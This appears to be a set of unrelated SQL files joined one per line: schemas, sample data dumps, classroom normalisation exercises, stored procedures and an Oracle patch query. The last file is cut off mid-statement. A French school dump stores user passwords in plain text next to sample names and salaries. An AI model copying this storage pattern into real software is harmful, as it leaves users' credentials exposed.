SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
SET SERVEROUTPUT ON SIZE 1000000 EXEC strdebug.print_txn('&1');
create database todo; CREATE TABLE `todo`.`articles` ( id INT NOT NULL AUTO_INCREMENT, type INT DEFAULT 1 COMMENT '用户类型 1普通文本 2代办事项', title VARCHAR(1000) NOT NULL COMMENT '标题', content TEXT NOT NULL COMMENT '内容', status INT NOT NULL COMMENT '状态 0未完成 1已完成', completed_time INT NOT NULL DEFAULT 0, deleted_time INT NOT NULL DEFAULT 0, created_time INT NOT NULL DEFAULT 0, updated_time INT NOT NULL DEFAULT 0, is_deleted INT NOT NULL DEFAULT 0, PRIMARY KEY (id), INDEX (type, status), INDEX (title), INDEX (created_time) ) ENGINE = InnoDB CHARACTER SET utf8 COLLATE utf8_general_ci COMMENT '文本表'; CREATE TABLE `todo`.`tags` ( id INT NOT NULL AUTO_INCREMENT, name VARCHAR(255) NOT NULL COMMENT '名称', description VARCHAR(255) NOT NULL COMMENT '描述', PRIMARY KEY (id), INDEX (name) ) ENGINE = InnoDB CHARACTER SET utf8 COLLATE utf8_general_ci COMMENT '标签表'; CREATE TABLE `todo`.`article_tag_refs` ( id INT NOT NULL AUTO_INCREMENT, article_id INT NOT NULL, tag_id INT NOT NULL, PRIMARY KEY (id), INDEX (article_id, tag_id) ) ENGINE = InnoDB CHARACTER SET utf8 COLLATE utf8_general_ci COMMENT '文章标签关联表';
create table summer( sid number, class varchar2(20), price number); insert into summer values (100, 'Java', 20000); insert into summer values (150, 'Python', 15000); insert into summer values (200, 'C++', 25000); insert into summer values (250, 'Java', 20000); select * from summer; select sid, class from summer; select price from summer where class = 'C++'; select distinct class from summer where price in (select max(price) from summer); select count(*), sum(price) from summer; -- 삭제이상현상 select price "C++수강료" from summer where class = 'C++'; /* 200번 학생의 수강 취소 */ delete from summer where sid = 200; select price "C++수강료" from summer where class = 'C++'; -- 삽입이상 /* JAVA 강좌 개설 */ insert into summer values (null, 'java', 25000); select count(*) "수강인원" from summer; select count(sid) "수강인원" from summer; select count(*) "수강인원" from summer where sid is not null; -- 수정이상현상 select * from summer; update summer set price = 15000 where class = 'Java'; -- 정상 update summer set price = 20000 where class = 'Java' and sid = 100; --같은 것에 대한 가격이 달라지는 상황 select price "Java 수강료" from summer where class = 'Java'; -- 수정된 계절학기 데이터베이스 drop table summerprice; drop table summerenroll; create table summerclass( sid number not null primary key, class varchar2(20)); create table summerprice( sid number not null references summerclass(sid), price number); insert into summerclass values (100, 'Java'); insert into summerclass values (150, 'Python'); insert into summerclass values (200, 'C++'); insert into summerclass values (250, 'Java'); insert into summerprice values (100, 20000); insert into summerprice values (150, 15000); insert into summerprice values (200, 25000); insert into summerprice values (250, 20000); select * from summerclass; select * from summerprice; -- 삭제 select price "C++ 수강료" from SummerPrice where class='C++'; /* 200번 학생의 수강취소 */ delete from Summerclass where sid=200; select price "C++ 수강료" from SummerPrice where class='C++'; -- 삽입 (NULL) /* JAVA 강좌 개설 */ insert into SummerPrice VALUES('JAVA',25000); /*수강인원 검색*/ SELECT count(*) "수강인원" from SummerPrice; -- 수정 select * from SummerPrice; update SummerPrice set price=15000 where class='JAVA'; select DISTINCT price "JAVA 수강료" from SummerPrice where class='JAVA'; -- 삭제이상현상 select price "C++수강료" from summerprice where class = 'C++'; /* 200번 학생의 수강 취소 */ delete from summer where sid = 200; select price "C++수강료" from summer where class = 'C++'; -- 삽입이상 /* JAVA 강좌 개설 */ insert into summer values (null, 'java', 25000); select count(*) "수강인원" from summer; select count(sid) "수강인원" from summer; select count(*) "수강인원" from summer where sid is not null; -- 수정이상현상 select * from summer; update summer set price = 15000 where class = 'Java'; -- 정상 update summer set price = 20000 where class = 'Java' and sid = 100; --같은 것에 대한 가격이 달라지는 상황 select price "Java 수강료" from summer where class = 'Java';
-- phpMyAdmin SQL Dump -- version 4.6.6deb5 -- https://www.phpmyadmin.net/ -- -- Client : localhost:3306 -- Généré le : Mer 11 Septembre 2019 à 16:25 -- Version du serveur : 5.7.27-0ubuntu0.18.04.1 -- Version de PHP : 7.2.19-0ubuntu0.18.04.2 SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; SET time_zone = "+00:00"; /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8mb4 */; -- -- Base de données : `ecole` -- -- -------------------------------------------------------- -- -- Structure de la table `note` -- CREATE TABLE `note` ( `id` int(11) NOT NULL, `matiere` varchar(255) DEFAULT NULL, `note` float DEFAULT NULL, `date` date DEFAULT NULL, `idEleve` int(11) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8; -- -- Contenu de la table `note` -- INSERT INTO `note` (`id`, `matiere`, `note`, `date`, `idEleve`) VALUES (1, 'Français', 5, '2019-09-09', 1), (2, 'Histoire-Géographie', 15, '2019-09-09', 1), (3, 'Mathématiques', 16, '2019-09-09', 2), (4, 'Mathématiques', 10, '2019-09-10', 1), (5, 'Sciences', 9, '2019-09-10', 2), (6, 'Sport', 18, '2019-09-10', 3); -- -------------------------------------------------------- -- -- Structure de la table `user` -- CREATE TABLE `user` ( `id` int(11) NOT NULL, `statut` varchar(255) NOT NULL, `nom` varchar(255) NOT NULL, `prenom` varchar(255) NOT NULL, `sexe` char(1) DEFAULT NULL, `age` int(11) DEFAULT NULL, `identifiant` varchar(255) NOT NULL, `mdp` varchar(255) NOT NULL, `classe` varchar(255) DEFAULT NULL, `eleve_id` int(11) DEFAULT NULL, `emailParent` varchar(255) DEFAULT NULL, `email` varchar(255) DEFAULT NULL, `anciennete` int(11) DEFAULT NULL, `salaire` double DEFAULT NULL, `expulsion` tinyint(1) DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8; -- -- Contenu de la table `user` -- INSERT INTO `user` (`id`, `statut`, `nom`, `prenom`, `sexe`, `age`, `identifiant`, `mdp`, `classe`, `eleve_id`, `emailParent`, `email`, `anciennete`, `salaire`, `expulsion`) VALUES (1, 'Directeur', 'Goldman', 'Jean-Jacques', NULL, NULL, 'Goldman_JJ', 'goldPass', NULL, NULL, NULL, NULL, NULL, NULL, NULL), (2, 'Instituteur', 'Delenoix', 'Jean', NULL, NULL, 'Delenoix_J', 'delePass', 'CP', NULL, NULL, 'jean.delenoix@mail.com', 1, 24000, NULL), (3, 'Instituteur', 'Bekritch', 'Justine', NULL, NULL, 'Bekritch_J', 'bekrPass', 'CE1', NULL, NULL, 'justine.bekritch@mail.com', 12, 28000, NULL), (4, 'Instituteur', 'Garbo', 'Greta', NULL, NULL, 'Garbo_G', 'garbPass', 'CE2', NULL, NULL, 'greta.garbo@mail.com', 7, 26800, NULL), (5, 'Instituteur', 'Ghelain', 'Georges', NULL, NULL, 'Ghelain_G', 'ghelPass', 'CM1', NULL, NULL, 'georges.ghelain@mail.com', 8, 27000, NULL), (6, 'Instituteur', 'Charbonnier', 'Gisèle', NULL, NULL, 'Charbonnier_G', 'charPass', 'CM2', NULL, NULL, 'gisele.charbonnier@mail.com', 5, 23000, NULL), (7, 'Eleve', 'Allon', 'Levy', 'h', 6, 'allon_l', 'allonPass', 'CP', 1, 'famille.allon@mail.com', NULL, NULL, NULL, 0), (8, 'Eleve', 'Bacard', 'Hugo', 'h', 5, 'bacard_h', 'bacardPass', 'CP', 2, 'famille.bacard@mail.com', NULL, NULL, NULL, 1), (9, 'Eleve', 'Becker', 'Matthew', 'h', 6, 'becker_m', 'beckerPass', 'CP', 3, 'famille.becker@mail.com', NULL, NULL, NULL, 0), (10, 'Eleve', 'Balwe', 'Chetan', 'M', 8, 'balwe_c', 'belwepass', 'CP', 4, 'belwefamily@gmail.com', NULL, NULL, NULL, NULL); -- -- Index pour les tables exportées -- -- -- Index pour la table `note` -- ALTER TABLE `note` ADD PRIMARY KEY (`id`), ADD KEY `note_FK` (`idEleve`); -- -- Index pour la table `user` -- ALTER TABLE `user` ADD PRIMARY KEY (`id`), ADD UNIQUE KEY `eleve_id` (`eleve_id`); -- -- AUTO_INCREMENT pour les tables exportées -- -- -- AUTO_INCREMENT pour la table `note` -- ALTER TABLE `note` MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=7; -- -- AUTO_INCREMENT pour la table `user` -- ALTER TABLE `user` MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=11; -- -- Contraintes pour les tables exportées -- -- -- Contraintes pour la table `note` -- ALTER TABLE `note` ADD CONSTRAINT `note_FK` FOREIGN KEY (`idEleve`) REFERENCES `user` (`eleve_id`); /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
create table if not exists socks ( id serial not null, color varchar(50), cotton_part integer, quantity integer not null );
insert into datos values(1,'Responsable de acceso a la información pública','Sr. Lorenzo Orlando James Coyco Piscoya','',1); insert into datos values(2,'Responsable de la Elaboración del Portal Institucional','Ing. Hector Alejandro Soto Vives','',1); insert into datos values(3,'Nombre del Año 2020','Año de la universalización de la salud, Lambayeque - 2020','',1); insert into datos values(4,'Imagen Cabecera Principal','bienvenida','static/images/capacitacion1.jpg',1); insert into datos values(5,'Imagen Cabecera Principal','bienvenida','static/images/capacitacion2.jpg',1); insert into datos values(6,'Imagen Cabecera Principal','bienvenida','static/images/capacitacion3.jpg',1); insert into datos values(7,'Imagen Cabecera Principal','bienvenida','static/images/capacitacion4.jpg',1); insert into datos values(8,'Imagen Cabecera Principal','bienvenida','static/images/capacitacion5.png',1); insert into datos values(9,'bienvenida','presentacion','static/images/presentacion.png',1); insert into datos values(10,'nosotros','presentacion','static/images/presentacion_Szg5CMO.png',1); insert into datos values(11,'nosotros','mision','static/images/mision.png',1); insert into datos values(12,'nosotros','vision','static/images/vision.png',1); insert into datos values(13,'nosotros','cabecera','static/images/hospital_mercedes.png',1); insert into datos values(14,'Imagen Cabecera Principal','escudo','static/images/escudo.png',1); insert into datos values(15,'Imagen Cabecera Principal','Logo de Lambayeque','static/images/logo-lambayeque.png',1); insert into especialidad(nombreespecialidad) values('Medicina'); insert into especialidad(nombreespecialidad) values('Enfermeria'); insert into especialidad(nombreespecialidad) values('Laboratio'); insert into especialidad(nombreespecialidad) values('Farmacia');
-- ------------------------------------------------------------------------------------- -- 3) Creating new customers -- ------------------------------------------------------------------------------------- DELIMITER ++ CREATE PROCEDURE CustomerInsert( IN aname CHAR(20), IN aaddress CHAR(20), IN acity CHAR(20) ) BEGIN INSERT INTO customer(name,address,city) VALUES(aname, aaddress, acity); SELECT * FROM customer WHERE name=aname AND address=aaddress AND city=acity; END ++ DELIMITER ; -- Delete the procedure DROP PROCEDURE CustomerInsert; -- ------------------------------------------------------------------------------------- -- 4) Creating a customer account -- ------------------------------------------------------------------------------------- DELIMITER ++ CREATE PROCEDURE AccountAdd( IN acustomernumber INT, IN acredit INT ) BEGIN INSERT INTO account(customer,balance,credit) VALUES(acustomernumber, 0, acredit); SELECT * FROM account WHERE customer=acustomernumber AND credit=acredit; END ++ DELIMITER ; -- Delete the procedure DROP PROCEDURE AccountAdd; -- ------------------------------------------------------------------------------------- -- 5) Depositing money into a customer account -- ------------------------------------------------------------------------------------- /* CREATE PROCEDURE raise(`errno` BIGINT UNSIGNED, `message` VARCHAR(256)) BEGIN SIGNAL SQLSTATE 'ERROR' SET MESSAGE_TEXT = `message`, MYSQL_ERRNO = `errno`; END */ DELIMITER ++ CREATE PROCEDURE AmountDeposit(IN aacountnumber INT,IN aamount INT) BEGIN DECLARE newbalance INTEGER; DECLARE my_error CONDITION FOR SQLSTATE '45000'; DECLARE CONTINUE HANDLER FOR my_error RESIGNAL SET MESSAGE_TEXT = 'The amount should be positive'; IF(aamount < 0) THEN SIGNAL my_error; END IF; SET newbalance = (SELECT balance FROM account WHERE number=aacountnumber); SET newbalance = newbalance+aamount; UPDATE account SET balance=newbalance WHERE account.number=aacountnumber; SELECT * FROM account WHERE number=aacountnumber; END++ DELIMITER ; -- Delete the procedure DROP PROCEDURE AmountDeposit; -- ------------------------------------------------------------------------------------- -- 6) Finalizing a sale (QOH = Quantity on hands) -- ------------------------------------------------------------------------------------- DELIMITER ++ CREATE PROCEDURE SaleFinalize(IN aacountnumber INT,IN atransacid INT) BEGIN -- Select the amount DECLARE amount INT; -- Variables DECLARE newbalance INT; DECLARE item INT; DECLARE dept INT; DECLARE quantity INT; DECLARE itemprice INT; DECLARE total INT; DECLARE qoh_temp INT; DECLARE done BOOLEAN; -- Cursor DECLARE c CURSOR FOR (SELECT S.item, S.dept, S.quantity, T.amount FROM sale S, transact T WHERE T.number=S.debit AND T.account=aacountnumber AND T.number=atransacid); DECLARE CONTINUE HANDLER FOR NOT FOUND SET done = TRUE; -- Set total to 0 SET total = 0; -- Open the cursor and begin OPEN c; theloop: LOOP FETCH c INTO item, dept, quantity, amount; IF done THEN LEAVE theloop; -- END IF; -- IF (total>=amount) THEN LEAVE theloop; ELSE SET itemprice = (SELECT price FROM item WHERE number=item); -- Update the temporary total SET total=total+quantity*itemprice; -- Update the QOH (carries table) SET qoh_temp = (SELECT qoh FROM carries WHERE carries.item=item AND carries.dept=dept); SET qoh_temp = qoh_temp-1; UPDATE carries SET qoh=qoh_temp WHERE carries.item=item AND carries.dept=dept; END IF; END LOOP; CLOSE c; -- Update balance of the user account SET newbalance = (SELECT balance FROM account WHERE number=aacountnumber); -- SELECT newbalance; SET newbalance = newbalance-amount; -- SELECT newbalance; UPDATE account SET balance=newbalance WHERE account.number=aacountnumber; -- Display the amount of the user account SELECT * FROM account WHERE number=aacountnumber; END++ DELIMITER ; -- Delete the procedure DROP PROCEDURE SaleFinalize; -- ------------------------------------------------------------------------------------- -- 7) Update trigger that checks if a customer account exceeds its given credit limit. -- ------------------------------------------------------------------------------------- CREATE TABLE overdraft( date TIMESTAMP, account INT(5), overdraft_amount INT(5) ); ALTER TABLE overdraft MODIFY date datetime DEFAULT CURRENT_TIMESTAMP; SELECT * FROM overdraft; DELIMITER ++ CREATE TRIGGER exceed_credit_limit BEFORE UPDATE on account FOR EACH ROW BEGIN DECLARE credit_limit INT; DECLARE payment INT; SET credit_limit=old.credit; SET payment=old.balance-new.balance; IF (payment>0) THEN IF (payment>=1.1*credit_limit) THEN SIGNAL SQLSTATE '45000' SET MESSAGE_TEXT = 'Impossible to update the table ACCOUNT : credit exceeded'; END IF; IF (payment>=credit_limit && payment<1.1*credit_limit) THEN INSERT INTO overdraft(account,overdraft_amount) VALUES(new.number,payment-credit_limit); END IF; END IF; END ++ DELIMITER ; DROP TRIGGER IF EXISTS exceed_credit_limit; -- ------------------------------------------------------------------------------------- -- Use the procedures -- ------------------------------------------------------------------------------------- -- 3 CALL CustomerInsert('Jon Snow', 'Space Needle', 'Seattle'); -- 4 CALL AccountAdd(7,2000); -- 5 CALL AmountDeposit(14356545, 40); CALL AmountDeposit(14356545, -100); -- 6 CALL AmountDeposit(12591815, 10000); CALL SaleFinalize(12591815,100594); SELECT * FROM carries WHERE item=52 AND dept=60; SELECT * FROM account WHERE number=12591815; -- 7 -- TEST the Trigger -- Amount OK (adding money) UPDATE ACCOUNT SET balance=5000 WHERE number=12591815; SELECT * FROM account WHERE number=12591815; SELECT * FROM overdraft WHERE account=12591815; -- Amount OK (<1000) UPDATE ACCOUNT SET balance=4200 WHERE number=12591815; SELECT * FROM account WHERE number=12591815; SELECT * FROM overdraft WHERE account=12591815; -- Amount OK (>credit & <credit+10%) + log in overdraft UPDATE ACCOUNT SET balance=3150 WHERE number=12591815; SELECT * FROM account WHERE number=12591815; SELECT * FROM overdraft WHERE account=12591815; -- Amount NOK (>credit+10%) + blocking update UPDATE ACCOUNT SET balance=0 WHERE number=12591815; SELECT * FROM account WHERE number=12591815; SELECT * FROM overdraft WHERE account=12591815;
/* 2 project & benefit*/ select p.id_user, p.description, b.name from project p inner join benefit_project b on p.id_project = b.project_id /* 3 project & benefir & goal */ select p.name, p.description, b.name, g.name from project p inner join benefit_project b on p.id_project = b.project_id inner join goal_project g on p.id_project = g.project_id
# Dump of table actor # ------------------------------------------------------------ DROP TABLE IF EXISTS `actor`; CREATE TABLE `actor` ( `actor_id` int(11) NOT NULL AUTO_INCREMENT, `fname` varchar(255) NOT NULL, `lname` varchar(255) DEFAULT NULL, PRIMARY KEY (`actor_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; LOCK TABLES `actor` WRITE; /*!40000 ALTER TABLE `actor` DISABLE KEYS */; INSERT INTO `actor` (`actor_id`, `fname`, `lname`) VALUES (1,'Callandraaaaa','Henderson'), (2,'linda','goober'), (3,'harry','humphery'), (4,'test_fname','goober'), (12,'linda','Walson'), (15,'Gerard','Butler'); /*!40000 ALTER TABLE `actor` ENABLE KEYS */; UNLOCK TABLES; # Dump of table director # ------------------------------------------------------------ DROP TABLE IF EXISTS `director`; CREATE TABLE `director` ( `director_id` int(11) NOT NULL AUTO_INCREMENT, `fname` varchar(255) NOT NULL, `lname` varchar(255) DEFAULT NULL, PRIMARY KEY (`director_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; LOCK TABLES `director` WRITE; /*!40000 ALTER TABLE `director` DISABLE KEYS */; INSERT INTO `director` (`director_id`, `fname`, `lname`) VALUES (2,'Harry','Goober'), (3,'Stephen','Spielberg'), (17,'linda','goober'); /*!40000 ALTER TABLE `director` ENABLE KEYS */; UNLOCK TABLES; # Dump of table genre # ------------------------------------------------------------ DROP TABLE IF EXISTS `genre`; CREATE TABLE `genre` ( `genre_id` int(11) NOT NULL AUTO_INCREMENT, `genre_type` varchar(255) NOT NULL DEFAULT '', PRIMARY KEY (`genre_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; LOCK TABLES `genre` WRITE; /*!40000 ALTER TABLE `genre` DISABLE KEYS */; INSERT INTO `genre` (`genre_id`, `genre_type`) VALUES (1,'action'), (2,'kung fu'), (3,'science fiction'), (4,'horror'), (5,'Bollywood'); /*!40000 ALTER TABLE `genre` ENABLE KEYS */; UNLOCK TABLES; # Dump of table movie # ------------------------------------------------------------ DROP TABLE IF EXISTS `movie`; CREATE TABLE `movie` ( `movie_id` int(11) NOT NULL AUTO_INCREMENT, `title` varchar(255) DEFAULT NULL, `release_date` date DEFAULT NULL, PRIMARY KEY (`movie_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; LOCK TABLES `movie` WRITE; /*!40000 ALTER TABLE `movie` DISABLE KEYS */; INSERT INTO `movie` (`movie_id`, `title`, `release_date`) VALUES (1,'Four Rooms','1995-12-20'), (2,'Raptor','1998-01-21'), (3,'Viper2','1994-12-21'), (4,'Mechanic','2008-02-02'), (5,'Commander','2010-02-25'); /*!40000 ALTER TABLE `movie` ENABLE KEYS */; UNLOCK TABLES; # Dump of table movie_cast # ------------------------------------------------------------ DROP TABLE IF EXISTS `movie_cast`; CREATE TABLE `movie_cast` ( `movie_id` int(11) DEFAULT NULL, `actor_id` int(11) DEFAULT NULL, `role` varchar(255) DEFAULT NULL, KEY `movie_id` (`movie_id`), KEY `actor_id` (`actor_id`), CONSTRAINT `movie_cast_ibfk_1` FOREIGN KEY (`movie_id`) REFERENCES `movie` (`movie_id`), CONSTRAINT `movie_cast_ibfk_2` FOREIGN KEY (`actor_id`) REFERENCES `actor` (`actor_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; LOCK TABLES `movie_cast` WRITE; /*!40000 ALTER TABLE `movie_cast` DISABLE KEYS */; INSERT INTO `movie_cast` (`movie_id`, `actor_id`, `role`) VALUES (1,1,'Jack Sparrow'), (2,2,'Will Turner'), (5,4,'Graves'), (3,4,'rap god'), (2,1,'miss fortune'); /*!40000 ALTER TABLE `movie_cast` ENABLE KEYS */; UNLOCK TABLES; # Dump of table movie_direct # ------------------------------------------------------------ DROP TABLE IF EXISTS `movie_direct`; CREATE TABLE `movie_direct` ( `movie_id` int(11) DEFAULT NULL, `director_id` int(11) DEFAULT NULL, UNIQUE KEY `movie_id_2` (`movie_id`), KEY `movie_id` (`movie_id`), KEY `director_id` (`director_id`), CONSTRAINT `movie_direct_ibfk_1` FOREIGN KEY (`movie_id`) REFERENCES `movie` (`movie_id`), CONSTRAINT `movie_direct_ibfk_2` FOREIGN KEY (`director_id`) REFERENCES `director` (`director_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; LOCK TABLES `movie_direct` WRITE; /*!40000 ALTER TABLE `movie_direct` DISABLE KEYS */; INSERT INTO `movie_direct` (`movie_id`, `director_id`) VALUES (1,2), (2,2), (3,3), (4,17); /*!40000 ALTER TABLE `movie_direct` ENABLE KEYS */; UNLOCK TABLES; # Dump of table movie_genre # ------------------------------------------------------------ DROP TABLE IF EXISTS `movie_genre`; CREATE TABLE `movie_genre` ( `movie_id` int(11) DEFAULT NULL, `genre_id` int(11) DEFAULT NULL, KEY `movie_id` (`movie_id`), KEY `genre_id` (`genre_id`), CONSTRAINT `movie_genre_ibfk_1` FOREIGN KEY (`movie_id`) REFERENCES `movie` (`movie_id`), CONSTRAINT `movie_genre_ibfk_2` FOREIGN KEY (`genre_id`) REFERENCES `genre` (`genre_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; LOCK TABLES `movie_genre` WRITE; /*!40000 ALTER TABLE `movie_genre` DISABLE KEYS */; INSERT INTO `movie_genre` (`movie_id`, `genre_id`) VALUES (1,1), (2,2), (4,2), (5,5), (5,4); /*!40000 ALTER TABLE `movie_genre` ENABLE KEYS */; UNLOCK TABLES; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
insert into users values (1,'user1','disable'); insert into users values (2,'user2','disable'); insert into users values (3,'user3','disable'); insert into users values (4,'user4','disable'); insert into users values (5,'user5','disable'); insert into users values (6,'user6','disable'); insert into users values (7,'user7','disable'); insert into users values (8,'user8','disable'); insert into users values (9,'user9','disable'); insert into users values (10,'user10','disable'); insert into users values (11,'user11','disable'); insert into tracker values (1,'tracker1','enable'); insert into tracker values (2,'tracker2','enable'); insert into tracker values (3,'tracker3','enable'); insert into tracker_users_list values (1000,'enable',1,1); insert into tracker_users_list values (1001,'enable',1,2); insert into tracker_users_list values (1002,'enable',1,3); insert into tracker_users_list values (1003,'enable',1,4); insert into tracker_users_list values (1004,'enable',1,5); insert into tracker_users_list values (1005,'enable',2,6); insert into tracker_users_list values (1006,'enable',2,7); insert into tracker_users_list values (1007,'enable',2,8); insert into tracker_users_list values (1008,'enable',2,9); insert into tracker_users_list values (1009,'enable',2,10); insert into tracker_users_list values (1010,'enable',3,11); insert into tracker_users_list values (1011,'enable',3,1); insert into tracker_users_list values (1012,'enable',3,2); insert into tracker_users_list values (1013,'enable',3,3); insert into tracker_users_list values (1014,'enable',3,4);
CREATE TABLE POST ( POST_ID INTEGER AUTO_INCREMENT PRIMARY KEY, TITLE VARCHAR(100), POST_DATE TIMESTAMP ); CREATE TABLE RECORD ( ID INTEGER AUTO_INCREMENT PRIMARY KEY, VALUE VARCHAR, POST_ID INTEGER ); ALTER TABLE RECORD ADD CONSTRAINT post_FK FOREIGN KEY (POST_ID) REFERENCES POST; CREATE TABLE LIKE_ ( ID INTEGER AUTO_INCREMENT PRIMARY KEY, val CHAR(1) ); CREATE TABLE RECORD_LIKE ( LIKE_ID INTEGER, RECORD__ID INTEGER ); ALTER TABLE RECORD_LIKE ADD CONSTRAINT like_FK FOREIGN KEY (LIKE_ID) REFERENCES LIKE_; ALTER TABLE RECORD_LIKE ADD CONSTRAINT rec_FK FOREIGN KEY (RECORD__ID) REFERENCES RECORD; INSERT INTO POST VALUES (1, 'title_1', '2001-01-01 00:00:00.000'); INSERT INTO POST VALUES (2, 'title_4', '2001-01-01 00:00:00.000'); INSERT INTO POST VALUES (3, 'title_5', '2001-01-01 00:00:00.000'); INSERT INTO POST VALUES (4, 'title_6', '2001-01-01 00:00:00.000'); INSERT INTO POST VALUES (5, 'title_3', '2001-01-01 00:00:00.000'); INSERT INTO RECORD VALUES (1, 'bla bla lbalasdfhjasb dvlf', 1); INSERT INTO RECORD VALUES (2, 'bla bla lbalasdfhjasb dvlf', 1); INSERT INTO RECORD VALUES (3, 'bla bla lbalasdfhjasb dvlf', 1); INSERT INTO RECORD VALUES (4, 'bla bla lbalasdfhjasb dvlf', 2); INSERT INTO LIKE_ VALUES (1, 'Y'); INSERT INTO LIKE_ VALUES (2, 'N'); INSERT INTO LIKE_ VALUES (3, NULL); INSERT INTO RECORD_LIKE VALUES (1, 1); INSERT INTO RECORD_LIKE VALUES (2, 1); INSERT INTO RECORD_LIKE VALUES (3, 1); INSERT INTO RECORD_LIKE VALUES (1, 2);
set serveroutput on; set verify on set termout on set feedback on set linesize 130 DECLARE ora_fixpack varchar2(50); BEGIN --- --- FIXPACK --- SELECT * into ora_fixpack FROM (select comments from sys.registry$history WHERE bundle_series = 'PSU' ORDER BY action_time) suppliers2 WHERE rownum <= 1 ORDER BY rownum; --- PRINT FIXPACK dbms_output.put_line('FIXPACK='||ora_fixpack); --- END; /
/* all the emums of app */ CREATE TABLE IF NOT EXISTS `enum` ( `id` INT(11) NOT NULL AUTO_INCREMENT, `created_at` DATETIME, `updated_at` DATETIME, `parent` INT(11) NULL DEFAULT NULL, `name` CHAR(120) NOT NULL, `sys_name` CHAR(120) NOT NULL, `descr` TEXT NULL, PRIMARY KEY (`id`), /* actually it isn't working propertly anyway becouse of null != null */ UNIQUE INDEX `unique_parent_sys_name` (`parent`, `sys_name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci; /* teachers */ CREATE TABLE IF NOT EXISTS `teachers` ( `id` int(11) NOT NULL AUTO_INCREMENT, `created_at` DATETIME, `updated_at` DATETIME, `name` varchar(50) NOT NULL, `sex` INT(3) NOT NULL, `phone` varchar(20), /* в разных странах номера разной длинны */ PRIMARY KEY (`id`), CONSTRAINT `uq_phone` UNIQUE (`phone`) ); /*students*/ CREATE TABLE IF NOT EXISTS `students` ( `id` int(11) NOT NULL AUTO_INCREMENT, `created_at` DATETIME, `updated_at` DATETIME, `name` varchar(50) NOT NULL, `email` varchar(120) NOT NULL, `birth_date` DATE, `level_id` INT(11) NOT NULL, PRIMARY KEY (`id`), CONSTRAINT `uq_email` UNIQUE (`email`), CONSTRAINT `fk_student_level_id_to_enum` FOREIGN KEY (`level_id`) REFERENCES `enum` (`id`) ON UPDATE CASCADE ON DELETE CASCADE ); /*teacher_stutents*/ CREATE TABLE IF NOT EXISTS teacher_student ( `id` INT(11) NOT NULL AUTO_INCREMENT, `created_at` DATETIME, `updated_at` DATETIME, `teacher_id` INT(11) NOT NULL, `student_id` INT(11) NOT NULL, PRIMARY KEY (`id`), CONSTRAINT `fk_teacher_id_to_teachers` FOREIGN KEY (`teacher_id`) REFERENCES `teachers` (`id`) ON UPDATE CASCADE ON DELETE CASCADE, CONSTRAINT `fk_student_id_to_students` FOREIGN KEY (`student_id`) REFERENCES `students` (`id`) ON UPDATE CASCADE ON DELETE CASCADE, CONSTRAINT `uq_teacher_student` UNIQUE (`teacher_id`, `student_id`) );
-- 数据库初始化脚本 -- 创建数据库 CREATE DATABASE seckill DEFAULT CHARACTER SET utf8; -- 使用数据库 USE seckill; CREATE TABLE seckill ( `seckill_id` BIGINT NOT NULL AUTO_INCREMENT COMMENT '商品库存ID', `name` VARCHAR(120) NOT NULL COMMENT '商品名称', `number` INT NOT NULL COMMENT '库存数量', `start_time` TIMESTAMP NOT NULL COMMENT '秒杀开始时间', `end_time` TIMESTAMP NOT NULL COMMENT '秒杀结束时间', `create_time` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP COMMENT '创建时间', PRIMARY KEY (seckill_id), KEY idx_start_time(start_time), KEY idx_end_time(end_time), KEY idx_create_time(create_time) ) ENGINE = INNODB AUTO_INCREMENT = 1000 COMMENT ='秒杀库存表'; -- 初始化数据 INSERT INTO seckill (name, number, start_time, end_time) VALUES ('1000元秒杀iphone6', 100, '2016-01-01 00:00:00', '2016-01-02 00:00:00'), ('800元秒杀ipad', 200, '2016-01-01 00:00:00', '2016-01-02 00:00:00'), ('6600元秒杀mac book pro', 300, '2016-01-01 00:00:00', '2016-01-02 00:00:00'), ('7000元秒杀iMac', 400, '2016-01-01 00:00:00', '2016-01-02 00:00:00'); -- 秒杀成功明细表 -- 用户登录认证相关信息(简化为手机号) CREATE TABLE success_killed ( `seckill_id` BIGINT NOT NULL COMMENT '秒杀商品ID', `user_phone` BIGINT NOT NULL COMMENT '用户手机号', `state` TINYINT NOT NULL DEFAULT -1 COMMENT '状态标识:-1:无效 0:成功 1:已付款 2:已发货', 